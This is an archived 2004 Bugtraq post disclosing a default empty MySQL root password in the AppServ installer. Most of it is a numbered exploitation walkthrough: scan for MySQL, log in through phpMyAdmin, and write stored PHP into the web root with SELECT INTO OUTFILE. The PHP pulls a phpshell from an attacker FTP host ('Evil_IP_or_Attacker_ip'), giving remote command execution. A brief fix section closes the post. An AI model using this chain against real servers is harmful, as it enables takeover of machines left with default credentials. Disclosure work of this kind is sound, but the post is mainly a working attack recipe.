AppServ 2.5.x and Prior Exploit

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: AppServ 2.5.x and Prior Exploit
From: saudi linux <ksa2ksa@xxxxxxxxx>
Date: 18 Nov 2004 16:18:15 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm


what AppServ
==========
AppServ is the Apache/PHP/MySQL open source software installer packages. 

Objective : - Easy to buid Webserver and Database Server
- For those who just beginning client/server programming.
- For web programmers/developers using PHP & MySQL.
- For programming techniques that is easily to be ported to other platforms 
such as WindowZ
- Single step installation , no need to perform multiple step, time consuming 
installation and configuration.
- Ready-to-run just after you've finished installing.ready-to-run just after 
you've finished installing.
- If you hate and boring M$ IIS Webserver. 
=====================================================
AppServ URL:http://www.appservnetwork.com

Vulnerability Ver: 2.5.X and prior

problem :
=================================

the program comes in default user (Root) and empty password which let attacker 
to contrlor program and computer.

=================================


Expliot Method

1)scan tool (SuperScan or whatever) 
this step to scan MySQL service on port 3306

2)when we found a serveic (MySQL on 3306) we can Reguest the IP from IE 
(Internet Explorer).
>From IE we can request the Machain IP like( http://xxx.xxx.xxx.xxx)

3)if we success the index page for AppServ open 

4)Now we can edit the databases and tables in Mysql by phpmyadmin
>From IE (http://xxx.xxx.xxx.xxx/PhpMyAdmin)

5)default MySQL Server come with two database (test,mysql),our target is (mysql 
).
Now we can add new table contains our exploit 

- Create New table for example (exploit) with one fild and type TEXT
-insert in database the exploit ( PHP code) like :

==============start=================
<?
$conn_id = ftp_connect("Evil_IP_or_Attacker_ip");
$login_result = ftp_login($conn_id, "Attacker", "Passwd");
$download = ftp_get($conn_id, "C:\AppServ\www\phpShell.php", "phpshell.php", 
FTP_BINARY);
ftp_quit($conn_id);
?>

==============end=====================

the attacker could use " Windows FTP Server" or any FTP daemon, it's not a 
matter :-)
phpshell.php is a script function like (system,passthru,exec ...etc)
you can find nice phpshell here (http://phpfm.sf.net )
the attacker could download EXE file else.

 
 6)Now we are able to make a query to outfile by use INTO OUTFILE statement .
SELECT * From exploit INTO OUTFILE 'C:\\AppServ\\www\\Query.php'

7)Query.php contain Our PHP code 

8)if we success we can reguest 
(http://xxx.xxx.xxx.xxx/Query.php)

9)if FTP connection successful and downloaded phpshell.php in the victim PC you 
can send new request like:
(http://xxx.xxx.xxx.xxx/phpshell.php)

10) Game's Over

==================================================
Fix
=====
1)change Root passowrd
2)use firewall for aptche and MySQL Server
3)use Save Mode for your script

==============================================================

                       discovered by  Saudi Linux

Prev by Date: Vulnerabilities in forum phpBB2 with Cash_Mod (all ver.)
Next by Date: Re: RX171104 Cscope v15.5 and minors - symlink vulnerability - advisory, exploit and patch.
Previous by thread: Re: Vulnerabilities in forum phpBB2 with Cash_Mod (all ver.)
Next by thread: EXEC exploit in phpBB - fix
Index(es):
- Date
- Thread